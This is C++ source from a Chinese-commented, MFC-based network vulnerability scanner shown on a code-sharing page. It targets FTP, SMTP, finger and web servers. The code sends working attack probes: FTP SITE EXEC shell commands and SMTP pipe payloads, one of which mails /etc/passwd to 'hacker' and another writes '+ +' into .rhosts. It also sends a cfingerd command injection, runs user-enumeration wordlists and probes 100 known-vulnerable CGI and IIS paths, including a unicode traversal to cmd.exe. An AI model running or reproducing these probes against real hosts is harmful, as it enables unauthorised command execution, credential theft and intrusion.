📄 scandlg.cpp
字号:
send(sockfd,"MKD ftpbug\r\n",sizeof("MKD ftpbug\r\n"),0);
Sleep(1000);
recv(sockfd,rbuff,sizeof(rbuff),0);
Sleep(1000);
(dlg->m_HistoryEdit).AppendString (rbuff);
memset(rbuff,0,1024);
(dlg->m_HistoryEdit).AppendString ("尝试执行Shell:");
send(sockfd,"SITE EXEC sh -c id\r\n",sizeof("SITE EXEC sh -c id\r\n"),0);
Sleep(1000);
recv(sockfd,rbuff,sizeof(rbuff),0);
Sleep(1000);
(dlg->m_HistoryEdit).AppendString (rbuff);
send(sockfd,"QUIT\r\n",sizeof("QUIT\r\n"),0);
Sleep(1000);
recv(sockfd,rbuff,sizeof(rbuff),0);
Sleep(1000);
closesocket(sockfd);
fEvent.SetEvent();
return 0;
}
//SMTP漏洞扫描线程
UINT sScan(LPVOID pParam)
{
int a;
int rcpt=0,expn=0,vrfy=0,port=25;
char rbuff[1024];
char sbuff[50];
CString buff;
CScanDlg* dlg=(CScanDlg*)pParam;
SOCKET sockfd;
SOCKADDR_IN addr;
CString username[28]={"root","test","www","web","sybase","oracle","informix",
"guest","sam_exec","+","oracle8","access","user","ftp",
"account","backup","owc","datebase","public","info",
"wais","news","bbs","adm","sync","john","beijing","china"};
CString bug[10]={"","debug","kill","wiz","rcpt to: /tmp/.rhosts","+ +","RSET",
"mail from: |/bin/mail hacker < /etc/passwd","RSET",
"mail from: |tail|sh"};
sockfd = socket(AF_INET, SOCK_STREAM, 0);
if (sockfd < 0)
{
(dlg->m_HistoryEdit).AppendString ("无法建立Socket\r\n");
return 0;
}
addr.sin_family = AF_INET;
addr.sin_port = htons(port);
addr.sin_addr.s_addr = inet_addr(rmt_host);
if(connect(sockfd,(struct sockaddr *) &addr, sizeof(addr))<0)
{
(dlg->m_HistoryEdit).AppendString ("目标没有开放SMTP服务...\r\n");
fEvent.SetEvent();
return 0;
}
memset(rbuff,0,1024);
(dlg->m_HistoryEdit).AppendString ("SMTP服务器的Banner:");
recv(sockfd,rbuff,sizeof(rbuff),0);
Sleep(1000);
(dlg->m_HistoryEdit).AppendString (rbuff);
send(sockfd,"HELP\r\n",sizeof("HELP\r\n"),0);
Sleep(1000);
memset(rbuff,0,1024);
recv(sockfd,rbuff,sizeof(rbuff),0);
Sleep(1000);
(dlg->m_HistoryEdit).AppendString (rbuff);
if(strstr(rbuff,"RCPT")!=NULL)
{
rcpt=1;
(dlg->m_HistoryEdit).AppendString ("可以使用RCPT命令获得用户名列表.\r\n");
}
if(strstr(rbuff,"VRFY")!=NULL)
{
vrfy=1;
(dlg->m_HistoryEdit).AppendString ("可以使用VRFY命令获得用户名列表.\r\n");
}
if(strstr(rbuff,"EXPN")!=NULL)
{
expn=1;
(dlg->m_HistoryEdit).AppendString ("可以使用EXPN命令获得用户名列表.\r\n");
}
send(sockfd,"HELO\r\n",6,0);
Sleep(1000);
recv(sockfd,rbuff,sizeof(rbuff),0);
Sleep(1000);
send(sockfd,"HELO\r\n",6,0);
Sleep(1000);
memset(rbuff,0,1024);
recv(sockfd,rbuff,sizeof(rbuff),0);
Sleep(1000);
(dlg->m_HistoryEdit).AppendString (rbuff);
send(sockfd,"MAIL FROM:hacker@hacker.com\r\n",29,0);
Sleep(1000);
memset(rbuff,0,1024);
recv(sockfd,rbuff,sizeof(rbuff),0);
Sleep(1000);
(dlg->m_HistoryEdit).AppendString (rbuff);
if(rcpt)
{
(dlg->m_HistoryEdit).AppendString ("尝试利用RCPT命令获得目标机上存在的一些常见用户名:");
for(a=0;a<28;a++)
{
memset(rbuff,0,1024);
memset(sbuff,0,50);
//(dlg->m_HistoryEdit).AppendString (username[a]);
strncpy(sbuff,"rcpt to:",8);
strcat(sbuff,username[a]);
strncat(sbuff,"\r\n",2);
//(dlg->m_HistoryEdit).AppendString (sbuff);
send(sockfd,sbuff,strlen(sbuff),0);
Sleep(1000);
recv(sockfd,rbuff,sizeof(rbuff),0);
if(strstr(rbuff,"250")!=NULL)
{
(dlg->m_HistoryEdit).AppendString (rbuff);
}
}//for(a=0;a<28;a++)
}//if(rcpt)
if(expn)
{
memset(rbuff,0,1024);
(dlg->m_HistoryEdit).AppendString ("\r\n检查decode别名:\r\n");
send(sockfd,"EXPN decode\r\n",sizeof("EXPN decode\r\n"),0);
Sleep(1000);
recv(sockfd,rbuff,sizeof(rbuff),0);
(dlg->m_HistoryEdit).AppendString (rbuff);
send(sockfd,"EXPN decode\r\n",sizeof("EXPN decode\r\n"),0);
Sleep(1000);
recv(sockfd,rbuff,sizeof(rbuff),0);
Sleep(200);
send(sockfd,"EXPN uudecode\r\n",sizeof("EXPN uudecode\r\n"),0);
Sleep(1000);
memset(rbuff,0,1024);
recv(sockfd,rbuff,sizeof(rbuff),0);
(dlg->m_HistoryEdit).AppendString (rbuff);
}
else
{
memset(rbuff,0,1024);
(dlg->m_HistoryEdit).AppendString ("\r\n检查decode别名:\r\n");
send(sockfd,"VRFY decode\r\n",sizeof("VRFY decode\r\n"),0);
Sleep(1000);
recv(sockfd,rbuff,sizeof(rbuff),0);
(dlg->m_HistoryEdit).AppendString (rbuff);
send(sockfd,"VRFY decode\r\n",sizeof("VRFY decode\r\n"),0);
Sleep(1000);
recv(sockfd,rbuff,sizeof(rbuff),0);
Sleep(200);
memset(rbuff,0,1024);
send(sockfd,"VRFY uudecode\r\n",sizeof("VRFY uudecode\r\n"),0);
Sleep(1000);
recv(sockfd,rbuff,sizeof(rbuff),0);
(dlg->m_HistoryEdit).AppendString (rbuff);
}
CString dis;
for(a=0;a<10;a++)
{
memset(rbuff,0,1024);
memset(sbuff,0,50);
strcpy(sbuff,bug[a]);
dis="\r\n检查";
dis+=bug[a];
dis+="漏洞";
(dlg->m_HistoryEdit).AppendString (dis);
strncat(sbuff,"\r\n",2);
send(sockfd,sbuff,strlen(sbuff),0);
Sleep(1000);
recv(sockfd,rbuff,sizeof(rbuff),0);
(dlg->m_HistoryEdit).AppendString (rbuff);
}
closesocket(sockfd);
fEvent.SetEvent();
return 0;
}
//FINGER漏洞扫描线程
UINT fingerScan(LPVOID pParam)
{
char rbuff[1024];
CScanDlg* dlg=(CScanDlg*)pParam;
SOCKET sockfd;
SOCKADDR_IN addr;
sockfd = socket(AF_INET, SOCK_STREAM, 0);
if (sockfd < 0)
{
(dlg->m_HistoryEdit).AppendString ("无法建立Socket\r\n");
return 0;
}
addr.sin_family = AF_INET;
addr.sin_port = htons(79);
addr.sin_addr.s_addr = inet_addr(rmt_host);
if(connect(sockfd,(struct sockaddr *) &addr, sizeof(addr))<0)
{
(dlg->m_HistoryEdit).AppendString ("目标没有开放FINGER服务...\r\n");
fEvent.SetEvent();
return 0;
}
memset(rbuff,0,1024);
(dlg->m_HistoryEdit).AppendString ("测试SunOS fingerd列出用户名漏洞:");
send(sockfd,"1234\r\n",sizeof("1234\r\n"),0);
Sleep(1000);
recv(sockfd,rbuff,sizeof(rbuff),0);
Sleep(1000);
(dlg->m_HistoryEdit).AppendString (rbuff);
(dlg->m_HistoryEdit).AppendString ("测试cfingerd执行任意命令漏洞:");
send(sockfd,"/W;/bin/id;#\r\n",sizeof("/W;/bin/id;#\r\n"),0);
memset(rbuff,0,1024);
Sleep(1000);
recv(sockfd,rbuff,sizeof(rbuff),0);
Sleep(1000);
(dlg->m_HistoryEdit).AppendString (rbuff);
(dlg->m_HistoryEdit).AppendString ("测试某些finger服务器执行任意命令漏洞:");
send(sockfd,"/bin/id\r\n",sizeof("/bin/id\r\n"),0);
memset(rbuff,0,1024);
Sleep(1000);
recv(sockfd,rbuff,sizeof(rbuff),0);
Sleep(1000);
(dlg->m_HistoryEdit).AppendString (rbuff);
(dlg->m_HistoryEdit).AppendString ("测试dot漏洞:");
send(sockfd,".\r\n",sizeof(".\r\n"),0);
memset(rbuff,0,1024);
Sleep(1000);
recv(sockfd,rbuff,sizeof(rbuff),0);
Sleep(1000);
(dlg->m_HistoryEdit).AppendString (rbuff);
closesocket(sockfd);
fEvent.SetEvent();
return 0;
}
//CGI漏洞扫描线程
UINT cgiScan(LPVOID pParam)
{
char rbuff[1024];
struct cgi mycgi[10];
char* cginame[100];
cginame[0]="/cgi-bin/unlg1.1";
cginame[1]="/cgi-bin/gH.cgi";
cginame[2]="/cgi-bin/rwwwshell.pl";
cginame[3]="/cgi-bin/phf";
cginame[4]="/cgi-bin/Count.cgi";
cginame[5]="/cgi-bin/test-cgi";
cginame[6]="/cgi-bin/nph-test-cgi";
cginame[7]="/cgi-bin/php.cgi";
cginame[8]="/cgi-bin/php";
cginame[9]="/cgi-bin/handler";
cginame[10]="/cgi-bin/webgais";
cginame[11]="/cgi-bin/websendmail";
cginame[12]="/cgi-bin/guestbook";
cginame[13]="/cgi-bin/webdist.cgi";
cginame[14]="/cgi-bin/faxsurvey";
cginame[15]="/cgi-bin/htmlscript";
cginame[16]="/cgi-bin/pfdispaly.cgi";
cginame[17]="/cgi-win/perl.exe";
cginame[18]="/cgi-bin/perl";
cginame[19]="/cgi-bin/wwwboard.pl";
cginame[20]="/cgi-bin/wwwboard.cgi";
cginame[21]="/cgi-bin/www-sql";
cginame[22]="/cgi-bin/view-source";
cginame[23]="/cgi-bin/wwwadmin.pl";
cginame[24]="/cgi-bin/formmail.pl";
cginame[25]="/cgi-bin/sendform.cgi";
cginame[26]="/cgi-bin/wrap";
cginame[27]="/cgi-bin/cgiwrap";
cginame[28]="/cgi-bin/edit.pl";
cginame[29]="/cgi-bin/perlshop.cgi";
cginame[30]="/cgi-bin/webbbs.cgi";
cginame[31]="/cgi-bin/whois_raw.cgi";
cginame[32]="/cgi-bin/AnyBoard.cgi";
cginame[33]="/cgi-bin/rguest.exe";
cginame[34]="/cgi-bin/campas";
cginame[35]="/cgi-bin/aglimpse";
cginame[36]="/cgi-bin/glimpse";
cginame[37]="/cgi-bin/man.sh";
cginame[38]="/cgi-bin/AT-admin.cgi";
cginame[39]="/cgi-bin/filemail.pl";
cginame[40]="/cgi-bin/maillist.pl";
cginame[41]="/cgi-bin/jj";
cginame[42]="/cgi-bin/info2www";
cginame[43]="/cgi-bin/files.pl";
cginame[44]="/cgi-bin/finger";
cginame[45]="/cgi-bin/bnbform.cgi";
cginame[46]="/cgi-bin/survey.cgi";
cginame[47]="/cgi-bin/AnyForm2";
cginame[48]="/cgi-bin/textcounter.pl";
cginame[49]="/cgi-bin/classifieds.cgi";
cginame[50]="/cgi-bin/environ.cgi";
cginame[51]="/_vti_pvt/service.pwd";
cginame[52]="/_vti_pvt/users.pwd";
cginame[53]="/_vti_pvt/authors.pwd";
cginame[54]="/_vti_pvt/administrators.pwd";
cginame[55]="/_vti_pvt/shtml.dll";
cginame[56]="/_vti_pvt/shtml.exe";
cginame[57]="/_vti_bin/fpexe";
cginame[58]="/cgi-dos/args.bat";
cginame[59]="/cgi-dos/args.cmd";
cginame[60]="/cgi-win/uploader.exe";
cginame[61]="/cgi-win/wguest.exe";
cginame[62]="/cgi-bin/wguest.exe";
cginame[63]="/scripts/wguest.exe";
cginame[64]="/scripts/issadmin/bdir.htr";
cginame[65]="/scripts/CGImail.exe";
cginame[66]="/scripts/tools/getdrvs.exe";
cginame[67]="/scripts/tools/newdsn.exe";
cginame[68]="/scripts/fpcount.exe";
cginame[69]="/scripts/counter.exe";
cginame[70]="/scripts/visadmin.exe";
cginame[71]="/cfdocs/expelval/openfile.cfm";
cginame[72]="/cfdocs/expelval/exprcalc.cfm";
cginame[73]="/cfdocs/expelval/displayopenedfile.cfm";
cginame[74]="/cfdocs/expelval/sendmail.cfm";
cginame[75]="/search97.vts";
cginame[76]="/carbo.dll";
cginame[77]="/?PageServices";
cginame[78]="/cgi-bin/guestbook.cgi";
cginame[79]="/scripts/..%c1%1c../winnt/system32/cmd.exe";
cginame[80]="/photoads/ads_data.pl";
cginame[81]="/photoads/cgi-bin/env.cgi";
cginame[82]="/cgi-bin/photo_cfg.pl";
cginame[83]="/password.log";
cginame[84]="/password.dat";
cginame[85]="/cgi-bin/password.log";
cginame[86]="/cgi-bin/password.dat";
cginame[87]="/~root";
cginame[88]="/cgi-bin/upload.pl";
cginame[89]="/iisadmpwd/achg.htr";
cginame[90]="/iisadmpwd/aexp.htr";
cginame[91]="/cgi-bin/fpcount.exe";
cginame[92]="//scripts/repost.asp";
cginame[93]="/_vti_inf.html";
cginame[94]="/msadc/Samples/SELECTOR/showcode.asp";
cginame[95]="/iisadmpwd/aexp2.htr";
cginame[96]="/iissamples/exair/search/advsearch.asp";
cginame[97]="/cgi-bin/aglimpse";
cginame[98]="/scripts/convert.bas";
cginame[99]="/scripts/lsass.exe";
cginame[100]="/cgi-bin/htmlscript";
CScanDlg* dlg=(CScanDlg*)pParam;
SOCKET sockfd;
SOCKADDR_IN addr;
sockfd = socket(AF_INET, SOCK_STREAM, 0);
if (sockfd < 0)
{
(dlg->m_HistoryEdit).AppendString ("无法建立Socket\r\n");
return 0;
}
addr.sin_family = AF_INET;
addr.sin_port = htons(80);
addr.sin_addr.s_addr = inet_addr(rmt_host);
if(connect(sockfd,(struct sockaddr *) &addr, sizeof(addr))<0)
{
(dlg->m_HistoryEdit).AppendString ("目标没有开放WWW服务...\r\n");
fEvent.SetEvent();
return 0;
}
memset(rbuff,0,1024);
(dlg->m_HistoryEdit).AppendString ("WWW服务器的Banner:");
send(sockfd,"HEAD / HTTP/1.0\n\n",sizeof("HEAD / HTTP/1.0\n\n"),0);
Sleep(1000);
recv(sockfd,rbuff,sizeof(rbuff),0);
Sleep(1000);
(dlg->m_HistoryEdit).AppendString (rbuff);
closesocket(sockfd);
(dlg->m_HistoryEdit).AppendString ("开始CGI漏洞的扫描,由于扫描漏洞数量较多,请耐心等待...\r\n");
for(int i=0;i<10;i++)
{
for(int j=0;j<10;j++)
{
mycgi[j].rmt_host=rmt_host;
mycgi[j].mydlg=dlg;
mycgi[j].url=cginame[i*10+j];
mycgi[j].n=j;
Thread[j]=AfxBeginThread(getcgi,(LPVOID)&mycgi[j]);
hThread[j]=Thread[j]->m_hThread;
Sleep(1);
}
WaitForMultipleObjects(10,hThread,TRUE,120000);
}
fEvent.SetEvent();
return 0;
}
//发送CGI请求的线程
UINT getcgi(LPVOID pParam)
{
char rbuff[1024];
struct cgi* tcgi=(struct cgi *)pParam;
char *hole=tcgi->url;
CString url="GET ";
url+=hole;
url+=" HTTP/1.0\n\n";
int num=tcgi->n;
char *rmt_host=tcgi->rmt_host;
CScanDlg* dlg=tcgi->mydlg;
SOCKET sockfd;
SOCKADDR_IN addr;
sockfd = socket(AF_INET, SOCK_STREAM, 0);
if (sockfd < 0)
{
exit(0);
}
addr.sin_family = AF_INET;
addr.sin_port = htons(80);
addr.sin_addr.s_addr = inet_addr(rmt_host);
int r = connect(sockfd,(struct sockaddr *) &addr, sizeof(addr));
send(sockfd,url,url.GetLength(),0);
memset(rbuff,0,1024);
Sleep(1000);
recv(sockfd,rbuff,sizeof(rbuff),0);
Sleep(1000);
CString display="\t发现";
display+=hole;
display+="漏洞\r\n";
if (strstr(rbuff,"200 OK")!=NULL)
{
(dlg->m_HistoryEdit).AppendString (display);
}
closesocket(sockfd);
return 0;
}
⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -